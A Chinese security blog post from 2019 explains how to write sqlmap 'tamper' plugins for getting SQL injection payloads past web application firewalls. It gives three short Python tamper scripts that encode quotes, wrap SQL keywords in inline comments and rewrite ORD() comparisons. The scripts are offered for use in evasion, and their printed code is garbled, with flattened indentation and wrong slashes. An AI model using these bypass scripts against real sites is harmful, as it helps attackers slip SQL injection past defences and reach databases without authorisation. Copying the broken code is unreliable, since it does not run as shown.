简述tamper 编写

颓废 2019年5月19日09:05:15评论403 views字数 1621阅读5分24秒阅读模式
摘要

下面是一个简单版的payload 代码:

tamper是sqlmap的一个集合的专门用来过WAF的插件,近期对这个比较感兴趣,就收集收集整理整理下。

下面是一个简单版的payload 代码:

from lib.core.enums import PRIORITY   __priority__ = PRIORITY.LOW   def dependencies():     pass   def tamper(payload,**kwargs):     if payload:   payload = payload.replace('/'', "%00%27")   print payload return payload

第一行和三行,都是制定插件的优先级的,一般是起作用于多个插件之间排序用的。

Dependencies() 这个函数不清楚而且大部分都是 pass ,所以我也就不去注意了。

Def tamper(payload,**kwargs)是这个插件的核心函数,payload 是主要的传递参数,**kwargs 也用少,没仔细测过。

用过 if 判断这个 payload 是否存有参数,如果有,那么把里面的 单引号’替换为 %00%27 。

最后返回函数本身这个 payload ,那个print 是我测试的时候输出看看的。

一般大家过狗的时候,都是使用 /**/,在注释里面添加一些特殊符号,等等来绕过正则,那么简单的编写可以这样:

from lib.core.enums import PRIORITY   __priority__ = PRIORITY.LOW   def dependencies():     pass   def tamper(payload,**kwargs):     if payload:   csfh = "/*@^.^@*/"   payload = payload.replace('UNION',csfh+"UNION"+csfh)   payload = payload.replace('SELECT',csfh+"SELECT"+csfh)   payload = payload.replace('AND',csfh+"AND"+csfh)   payload = payload.replace('=',csfh+"="+csfh)   payload = payload.replace(' ',csfh)   payload = payload.replace('FROM',csfh+"FROM"+csfh) return payload

这个主要是把联合查询的周围都加上/**/来绕过。

当然如果自己写,肯定不止这些了,可以通过正则把一些语句正则出来,然后再去替换自己需要修改的SQL语句。

#!/usr/bin/env python   Import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW   def dependencies():  pass   def tamper(payload, **kwargs):     retVal = payload     if payload:         match = re.search(r"(if/()(ORD/(.*?/))>(/d+)", payload, re.I)         if match:             _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(2), match.group(3), match.group(2))             retVal = retVal.replace(match.group(0), _) return retVal

这个是乌云漏洞库一个58的漏洞,白帽子自己写了一个过WAF的方法插件。

不过这种绕过方法就得靠自己扎实的SQL语法和正则能力了。

作者: shiyan

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:05:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   简述tamper 编写https://cn-sec.com/archives/68078.html

发表评论

匿名网友 填写信息